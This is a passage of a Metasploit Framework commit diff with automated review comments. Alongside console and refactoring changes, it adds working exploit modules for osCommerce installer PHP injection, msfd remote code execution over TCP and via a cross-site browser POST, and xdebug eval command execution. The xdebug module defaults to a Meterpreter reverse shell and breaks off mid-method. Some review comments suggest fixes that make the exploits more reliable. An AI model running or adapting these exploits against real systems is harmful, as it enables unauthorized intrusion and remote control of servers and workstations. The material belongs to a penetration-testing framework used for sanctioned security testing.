"\xff\xd6" # call *%esi #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x2e" + # movb $0x2e,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
# Append
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
# exit(0)
|
||||
app << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x01" +# movb $0x01,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
app << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x01" + # movb $0x01,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
# Prepend syscall code to prepend block
@ -207,7 +207,7 @@ class Db
|
|||
if names.first == Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME
|
||||
print_status("Recreated default workspace")
|
||||
end
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
print_error "Failed to rename workspace: #{e.message}"
|
||||
e.backtrace.each { |line| print_error "#{line}"}
|
||||
end
|
||||
|
@ -544,7 +544,7 @@ class Db
|
|||
when mode == [:tag]
|
||||
begin
|
||||
add_host_tag(host_ranges, tag_name)
|
||||
rescue ::Exception => e
|
||||
rescue => e
|
||||
if e.message.include?('Validation failed')
|
||||
print_error(e.message)
|
||||
else
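Review bot: The `if e.message.include?('Validation failed')` test at the end of this hunk sorts exceptions by their message text, which breaks silently if the wording ever changes and hides which exception class the code actually expects. If `add_host_tag` raises a dedicated validation exception (the 'Validation failed' prefix looks like ActiveRecord::RecordInvalid, but that is not visible here), rescue it by class — `rescue ActiveRecord::RecordInvalid => e` followed by `print_error(e.message)` — and leave the narrowed `rescue => e` for everything else. The `else` branch of this conditional continues outside the hunk.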
|
||||
|
@ -1130,7 +1130,7 @@ class Db
|
|||
end
|
||||
|
||||
framework.db.update_note(update_opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
elog "There was an error updating note with ID #{note.id}: #{e.message}"
|
||||
next
|
||||
end
|
||||
|
@ -1333,7 +1333,7 @@ class Db
|
|||
end
|
||||
loot.ltype = types.first if types
|
||||
framework.db.update_loot(loot.as_json.symbolize_keys)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
elog "There was an error updating loot with ID #{loot.id}: #{e.message}"
|
||||
next
|
||||
end
@ -19,8 +19,9 @@ module Msf
|
|||
CMD_USE_TIMEOUT = 3
|
||||
|
||||
@@search_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help banner."],
|
||||
"-S" => [ true, "Row search filter."],
|
||||
"-h" => [ false, "Help banner"],
|
||||
"-o" => [ true, "Send output to a file in csv format"],
|
||||
"-S" => [ true, "Search string for row filter"],
|
||||
)
|
||||
|
||||
def commands
|
||||
|
@ -410,7 +411,12 @@ module Msf
|
|||
end
|
||||
|
||||
def cmd_search_help
|
||||
print_line "Usage: search <keywords>"
|
||||
print_line "Usage: search [ options ] <keywords>"
|
||||
print_line
|
||||
print_line "OPTIONS:"
|
||||
print_line " -h Show this help information"
|
||||
print_line " -o <file> Send output to a file in csv format"
|
||||
print_line " -S <string> Search string for row filter"
|
||||
print_line
|
||||
print_line "Keywords:"
|
||||
{
|
||||
|
@ -442,26 +448,29 @@ module Msf
|
|||
return
|
||||
end
|
||||
|
||||
match = ''
|
||||
match = ''
|
||||
search_term = nil
|
||||
output_file = nil
|
||||
@@search_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-t"
|
||||
print_error("Deprecated option. Use type:#{val} instead")
|
||||
cmd_search_help
|
||||
return
|
||||
when "-S", "--search"
|
||||
when "-S"
|
||||
search_term = val
|
||||
when "-h"
|
||||
cmd_search_help
|
||||
return
|
||||
when "-S"
|
||||
search_term = val
|
||||
when '-o'
|
||||
output_file = val
|
||||
else
|
||||
match += val + " "
|
||||
end
|
||||
}
|
||||
|
||||
if match.empty? && search_term.nil?
|
||||
print_error("Keywords or search argument required\n")
|
||||
cmd_search_help
|
||||
return
|
||||
end
|
||||
|
||||
# Display the table of matches
|
||||
tbl = generate_module_table("Matching Modules", search_term)
|
||||
Msf::Modules::Metadata::Cache.instance.find(match).each do |m|
|
||||
|
@ -472,7 +481,15 @@ module Msf
|
|||
m.name
|
||||
]
|
||||
end
|
||||
print_line(tbl.to_s)
|
||||
|
||||
if output_file
|
||||
print_status("Wrote search results to #{output_file}")
|
||||
::File.open(output_file, "wb") { |ofd|
|
||||
ofd.write(tbl.to_csv)
|
||||
}
|
||||
else
|
||||
print_line(tbl.to_s)
|
||||
end
|
||||
end
|
||||
|
||||
#
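Review bot: `print_status("Wrote search results to #{output_file}")` is emitted before `::File.open(output_file, "wb")` runs, and the write has no rescue, so an unwritable path (EACCES, ENOENT, EISDIR) first reports success and then surfaces as an unhandled exception out of the console command. Move the status line after the write and rescue the I/O errors so the operator gets a clear message instead of a backtrace. The `else` branch printing the table is unchanged.
```ruby
      if output_file
        begin
          ::File.open(output_file, 'wb') { |ofd| ofd.write(tbl.to_csv) }
          print_status("Wrote search results to #{output_file}")
        rescue ::SystemCallError, ::IOError => e
          print_error("Could not write search results to #{output_file}: #{e.message}")
        end
      else
        print_line(tbl.to_s)
      end
```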
|
||||
|
@ -487,13 +504,6 @@ module Msf
|
|||
return @@search_opts.fmt.keys
|
||||
end
|
||||
|
||||
case (words[-1])
|
||||
when "-r"
|
||||
return RankingName.sort.map{|r| r[1]}
|
||||
when "-t"
|
||||
return %w{auxiliary encoder exploit nop payload post}
|
||||
end
|
||||
|
||||
[]
|
||||
end
@ -70,9 +70,9 @@ Gem::Specification.new do |spec|
|
|||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.3.33'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.3.34'
|
||||
# Needed for the next-generation POSIX Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.7'
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.8'
|
||||
# Needed by msfgui and other rpc components
|
||||
spec.add_runtime_dependency 'msgpack'
|
||||
# get list of network interfaces, like eth* from OS.
@ -5,6 +5,7 @@
|
|||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
|
||||
include Msf::Exploit::Remote::SMB::Client::Psexec
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
@ -92,119 +93,18 @@ class MetasploitModule < Msf::Auxiliary
|
|||
@ip = ip
|
||||
|
||||
# Try and authenticate with given credentials
|
||||
res = execute_command(text, bat)
|
||||
|
||||
if res
|
||||
for i in 0..(datastore['RETRY'])
|
||||
Rex.sleep(datastore['DELAY'])
|
||||
# if the output file is still locked then the program is still likely running
|
||||
if (exclusive_access(text))
|
||||
break
|
||||
elsif (i == datastore['RETRY'])
|
||||
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
|
||||
end
|
||||
end
|
||||
get_output(text)
|
||||
end
|
||||
|
||||
cleanup_after(text, bat)
|
||||
end
|
||||
|
||||
#
|
||||
# TODO: the rest shamelessly copypasta from auxiliary/admin/smb/psexec_command
|
||||
# it should probably be mixin'd. I have changed some of vprint/print tho
|
||||
# => zerosum0x0
|
||||
#
|
||||
|
||||
# Executes specified Windows Command
|
||||
def execute_command(text, bat)
|
||||
# Try and execute the provided command
|
||||
execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
|
||||
vprint_status("Executing the command...")
|
||||
begin
|
||||
return psexec(execute)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
|
||||
print_error("Unable to execute specified command: #{e}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
# Retrive output from command
|
||||
def get_output(file)
|
||||
vprint_status("Getting the command output...")
|
||||
output = smb_read_file(@smbshare, @ip, file)
|
||||
if output.nil?
|
||||
print_error("Error getting command output. #{$!.class}. #{$!}.")
|
||||
return
|
||||
end
|
||||
if output.empty?
|
||||
print_status("Command finished with no output")
|
||||
return
|
||||
end
|
||||
output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])
|
||||
|
||||
# Report output
|
||||
vprint_good("Command completed successfuly!")
|
||||
|
||||
# zerosum0x0: this is better with Verbose off in this case
|
||||
print_status("Output for \"#{datastore['COMMAND']}\":")
|
||||
print_line("#{output}")
|
||||
|
||||
print_good("Command completed successfuly!")
|
||||
print_status("Output for \"#{datastore['COMMAND']}\":\n")
|
||||
print_line("#{output}\n")
|
||||
report_note(
|
||||
:rhost => datastore['RHOSTS'],
|
||||
:rport => datastore['RPORT'],
|
||||
:type => "psexec_command",
|
||||
:type => "psexec_command",
|
||||
:name => datastore['COMMAND'],
|
||||
:data => output
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
# check if our process is done using these files
|
||||
def exclusive_access(*files)
|
||||
begin
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_error("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
files.each do |file|
|
||||
begin
|
||||
vprint_status("checking if the file is unlocked")
|
||||
fd = smb_open(file, 'rwo')
|
||||
fd.close
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_error("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
|
||||
# Removes files created during execution.
|
||||
def cleanup_after(*files)
|
||||
begin
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", ")} from the target.")
|
||||
return
|
||||
end
|
||||
vprint_status("Executing cleanup...")
|
||||
files.each do |file|
|
||||
begin
|
||||
smb_file_rm(file)
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
|
||||
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
|
||||
end
|
||||
end
|
||||
left = files.collect{ |f| smb_file_exist?(f) }
|
||||
if left.any?
|
||||
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
|
||||
else
|
||||
print_good("Cleanup was successful")
|
||||
end
|
||||
end
|
||||
|
||||
end
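Review bot: The new `output = execute_command_with_output(...)` result is used without a nil check — `print_good("Command completed successfuly!")`, the output banner and `report_note(... :data => output)` all run even when the helper returns nil, so a failed or still-running command is reported as success and stored as a note with empty data. The sibling psexec_command module in this same commit wraps the identical block in `unless output.nil?` … `end`; do the same here. Separately, the old `cleanup_after(text, bat)` call was dropped from this module while psexec_command keeps its own — confirm the helper removes the `text`/`bat` artifacts itself, otherwise this variant now leaves them on the target. The helper's definition is not in this diff, so its cleanup behavior cannot be confirmed from here.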
@ -69,112 +69,22 @@ class MetasploitModule < Msf::Auxiliary
|
|||
print_error("Unable to authenticate with given credentials: #{autherror}")
|
||||
return
|
||||
end
|
||||
res = execute_command(text, bat)
|
||||
output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])
|
||||
|
||||
if res
|
||||
for i in 0..(datastore['RETRY'])
|
||||
Rex.sleep(datastore['DELAY'])
|
||||
# if the output file is still locked then the program is still likely running
|
||||
if (exclusive_access(text))
|
||||
break
|
||||
elsif (i == datastore['RETRY'])
|
||||
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
|
||||
end
|
||||
end
|
||||
get_output(text)
|
||||
unless output.nil?
|
||||
print_good("Command completed successfuly!")
|
||||
print_status("Output for \"#{datastore['COMMAND']}\":\n")
|
||||
print_line("#{output}\n")
|
||||
report_note(
|
||||
:rhost => datastore['RHOSTS'],
|
||||
:rport => datastore['RPORT'],
|
||||
:type => "psexec_command",
|
||||
:name => datastore['COMMAND'],
|
||||
:data => output
|
||||
)
|
||||
end
|
||||
|
||||
cleanup_after(text, bat)
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
||||
# Executes specified Windows Command
|
||||
def execute_command(text, bat)
|
||||
# Try and execute the provided command
|
||||
execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
|
||||
print_status("Executing the command...")
|
||||
begin
|
||||
return psexec(execute)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
|
||||
print_error("Unable to execute specified command: #{e}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
# Retrive output from command
|
||||
def get_output(file)
|
||||
print_status("Getting the command output...")
|
||||
output = smb_read_file(@smbshare, @ip, file)
|
||||
if output.nil?
|
||||
print_error("Error getting command output. #{$!.class}. #{$!}.")
|
||||
return
|
||||
end
|
||||
if output.empty?
|
||||
print_status("Command finished with no output")
|
||||
return
|
||||
end
|
||||
|
||||
# Report output
|
||||
print_good("Command completed successfuly!")
|
||||
vprint_status("Output for \"#{datastore['COMMAND']}\":")
|
||||
vprint_line("#{output}")
|
||||
|
||||
report_note(
|
||||
:rhost => datastore['RHOSTS'],
|
||||
:rport => datastore['RPORT'],
|
||||
:type => "psexec_command",
|
||||
:name => datastore['COMMAND'],
|
||||
:data => output
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
# check if our process is done using these files
|
||||
def exclusive_access(*files)
|
||||
begin
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_status("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
files.each do |file|
|
||||
begin
|
||||
print_status("checking if the file is unlocked")
|
||||
fd = smb_open(file, 'rwo')
|
||||
fd.close
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_status("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
|
||||
# Removes files created during execution.
|
||||
def cleanup_after(*files)
|
||||
begin
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", ")} from the target.")
|
||||
return
|
||||
end
|
||||
print_status("Executing cleanup...")
|
||||
files.each do |file|
|
||||
begin
|
||||
smb_file_rm(file)
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
|
||||
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
|
||||
end
|
||||
end
|
||||
left = files.collect{ |f| smb_file_exist?(f) }
|
||||
if left.any?
|
||||
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
|
||||
else
|
||||
print_good("Cleanup was successful")
|
||||
end
|
||||
end
|
||||
end
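Review bot: `report_note(:rhost => datastore['RHOSTS'], ...)` in the retained block records the operator's whole RHOSTS expression rather than the host that produced the output, so a scanner run over a range files every note under the same range string; `@ip`, already passed to `execute_command_with_output` a few lines above, is the per-target value — `:rhost => @ip` (or `:host => @ip` if that is the key the reporting mixin expects; not visible here). Also `cleanup_after(text, bat)` is still called here although its definition was removed from this file and the MS17-010 variant in this commit no longer calls it: if the new helper already removes the files this produces 'Unable to cleanup' noise, and if it does not, the other module leaks them — the two callers should agree. The enclosing method begins outside the hunk.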
@ -55,6 +55,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
])
|
||||
end
|
||||
|
||||
# This module returns false positives for credentialed logins
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def telnet_timeout
|
||||
(datastore['TelnetTimeout'] || 10).to_i
|
||||
end
@ -0,0 +1,77 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Metasploit msfd Remote Code Execution via Browser',
|
||||
'Description' => %q{
|
||||
Metasploit's msfd-service makes it possible to get a msfconsole-like
|
||||
interface over a TCP socket. This module connects to the msfd-socket
|
||||
through the victim's browser.
|
||||
|
||||
To execute msfconsole-commands in JavaScript from a web application,
|
||||
this module places the payload in the POST-data. These POST-requests
|
||||
can be sent cross-domain and can therefore be sent to localhost on the
|
||||
victim's machine. The msfconsole-command to execute code is 'rbi -e
|
||||
"CODE"'.
|
||||
|
||||
Exploitation when the browser is running on Windows is unreliable and
|
||||
the exploit is only usable when IE is used and the quiet-flag has been
|
||||
passed to msf-daemon.
|
||||
},
|
||||
'License' => BSD_LICENSE,
|
||||
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
|
||||
'Platform' => 'ruby',
|
||||
'Arch' => ARCH_RUBY,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {}],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 8192, # Arbitrary limit
|
||||
'DisableNops' => 'True',
|
||||
'BadChars' => "\x22\x0a"
|
||||
},
|
||||
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
|
||||
OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
super
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
|
||||
sc = payload.encoded
|
||||
shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")
|
||||
var1 = rand_text_alpha(rand(6..11))
|
||||
var2 = rand_text_alpha(rand(6..11))
|
||||
html = <<-EOS
|
||||
<html>
|
||||
<head></head>
|
||||
<body>
|
||||
<script>
|
||||
var #{var1} = new XMLHttpRequest();
|
||||
#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
|
||||
var #{var2} = String("#{shellcode}");
|
||||
#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
print_status("#{msg} Sending HTML...")
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
end
|
||||
end
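Review bot: The escape builder `sc.unpack('U'*sc.length).collect {|x| x.to_s 16}` yields one-digit escapes (`\x9`, `\xd`) for bytes below 0x10 and three-digit ones for any code point above 0xFF, both invalid as JavaScript `\xHH` escapes, so such a payload breaks the script before the POST is ever sent; `unpack('U')` also decodes the payload as UTF-8 rather than raw bytes. Build it per byte with fixed width instead: `shellcode = sc.each_byte.map { |b| format('\\x%02x', b) }.join`. Two smaller items: the description says `'rbi -e "CODE"'` where the page actually sends `irb -e`, and `def exploit; super; end` adds nothing and can be dropped.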
@ -0,0 +1,100 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'osCommerce Installer Unauthenticated Code Execution',
|
||||
'Description' => %q{
|
||||
If the /install/ directory was not removed, it is possible for an unauthenticated
|
||||
attacker to run the "install_4.php" script, which will create the configuration
|
||||
file for the installation. This allows the attacker to inject PHP code into the
|
||||
configuration file and execute it.
|
||||
},
|
||||
'Author' => [
|
||||
'Simon Scannell', # Original exploit author
|
||||
'Daniel Teixeira' # MSF module author
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '44374'],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'osCommerce 2.3.4.1', { } ],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 30 2018',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/'])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI'], 'install.php'),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
unless res
|
||||
vprint_error 'Connection failed'
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
||||
unless res.code == 200 && res.body.include?('osCommerce Website')
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI'], 'index.php'),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res.body.include?('configure.php') && res.body.include?('The following files need to have their file permissions set to world-writeable (chmod 777):')
|
||||
vprint_error 'configure.php is not writable'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
CheckCode::Appears
|
||||
end
|
||||
|
||||
def trigger
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI'], 'includes/configure.php'),
|
||||
'method' => 'GET'
|
||||
})
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless check == CheckCode::Appears
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
data = {
|
||||
'DIR_FS_DOCUMENT_ROOT' => './',
|
||||
'DB_DATABASE' => "');#{payload.encoded}/*"
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI'], 'install.php?step=4'),
|
||||
'method' => 'POST',
|
||||
'vars_post' => data
|
||||
})
|
||||
trigger
|
||||
end
|
||||
end
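Review bot: In `check`, the result of the second `send_request_cgi` is dereferenced as `res.body` with no nil check, so a connection dropped between the two requests raises NoMethodError instead of returning `CheckCode::Unknown`; add `return CheckCode::Unknown unless res` before the `if res.body.include?('configure.php') && ...` line, mirroring the guard after the first request. In `exploit`, the `res` from the POST is assigned and never examined, so a 4xx/5xx on `install.php?step=4` still proceeds to `trigger` (and the `step=4` belongs in `'vars_get' => { 'step' => '4' }` rather than in the uri). Worth stating in the module description as well: per the description this writes the site's `includes/configure.php`, so a successful run overwrites the target's live configuration and is destructive to the install.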
@ -0,0 +1,66 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Metasploit msfd Remote Code Execution',
|
||||
'Description' => %q{
|
||||
Metasploit's msfd-service makes it possible to get a msfconsole-like
|
||||
interface over a TCP socket. If this socket is accessible on a remote
|
||||
interface, an attacker can execute commands on the victim's machine.
|
||||
|
||||
If msfd is running with higher privileges than the current local user,
|
||||
this module can also be used for privilege escalation. In that case,
|
||||
port forwarding on the compromised host can be used.
|
||||
|
||||
Code execution is achieved with the msfconsole command: irb -e 'CODE'.
|
||||
},
|
||||
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
|
||||
'License' => BSD_LICENSE,
|
||||
'Platform' => "ruby",
|
||||
'Arch' => ARCH_RUBY,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 8192, # Arbitrary limit
|
||||
'BadChars' => "\x27\x0a",
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(55554)
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
data = sock.get_once
|
||||
if data.include?("msf")
|
||||
disconnect
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
disconnect
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
sock.get_once
|
||||
sock.put "irb -e '" + payload.encoded + "'\n"
|
||||
disconnect
|
||||
end
|
||||
end
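Review bot: `check` calls `data.include?("msf")` on the return of `sock.get_once`, which is nil when the peer closes or sends nothing within the timeout, so an unresponsive port raises NoMethodError rather than returning a CheckCode; write it as `if data && data.include?("msf")` and move `disconnect` into an `ensure` so the socket is closed on every path. `connect` itself raises on a refused port, so `check` should rescue `::Rex::ConnectionError` and return `Exploit::CheckCode::Unknown`. In `exploit`, `disconnect` immediately follows `sock.put`, with no read of whatever msfd sends back, so the operator gets no indication whether the `irb -e` line was accepted; a short `sock.get_once` before disconnect would give that signal.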
@ -0,0 +1,114 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Rex::Proto::Http
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'xdebug Unauthenticated OS Command Execution',
|
||||
'Description' => %q{
|
||||
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
|
||||
This allows the attacker to execute arbitrary php code as the context of the web user.
|
||||
},
|
||||
'DisclosureDate' => 'Sep 17 2017',
|
||||
'Author' => [
|
||||
'Ricter Zheng', #Discovery https://twitter.com/RicterZ
|
||||
'Shaksham Jaiswal', # MinatoTW
|
||||
'Mumbai' # Austin Hudson
|
||||
],
|
||||
'References' => [
|
||||
['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
|
||||
['URL', 'https://paper.seebug.org/397/']
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'php',
|
||||
'Arch' => [ARCH_PHP],
|
||||
'DefaultTarget' => 0,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
|
||||
},
|
||||
'Payload' => {
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Targets' => [[ 'Automatic', {} ]],
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
|
||||
OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
|
||||
OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
|
||||
Opt::RPORT(80),
|
||||
OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore["PATH"],
|
||||
'method' => 'GET',
|
||||
'vars_get' => {
|
||||
'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
|
||||
}
|
||||
})
|
||||
vprint_status "Request sent\n#{res.headers}"
|
||||
if res && res.headers.to_s =~ /XDEBUG/i
|
||||
vprint_good("Looks like remote server has xdebug enabled\n")
|
||||
return CheckCode::Detected
|
||||
else
|
||||
return CheckCode::Safe
|
||||
end
|
||||
rescue Rex::ConnectionError
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
payl = Rex::Text.encode_base64("#{payload.encoded}")
|
||||
file = "#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
|
||||
cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
|
||||
webserver = Thread.new do
|
||||
begin
|
||||
server = Rex::Socket::TcpServer.create(
|
||||
'LocalPort' => datastore['SRVPORT'],
|
||||
'LocalHost' => datastore['SRVHOST'],
|
||||
'Context' => {
|
||||
'Msf' => framework,
|
||||
'MsfExploit' => self
|
||||
})
|
||||
|
||||
client = server.accept
|
||||
print_status("Waiting for client response.")
|
||||
data = client.recv(1024)
|
||||
print_status("Receiving response")
|
||||
vprint_line(data)
|
||||
print_status("Shell might take upto a minute to respond.Please be patient.")
|
||||
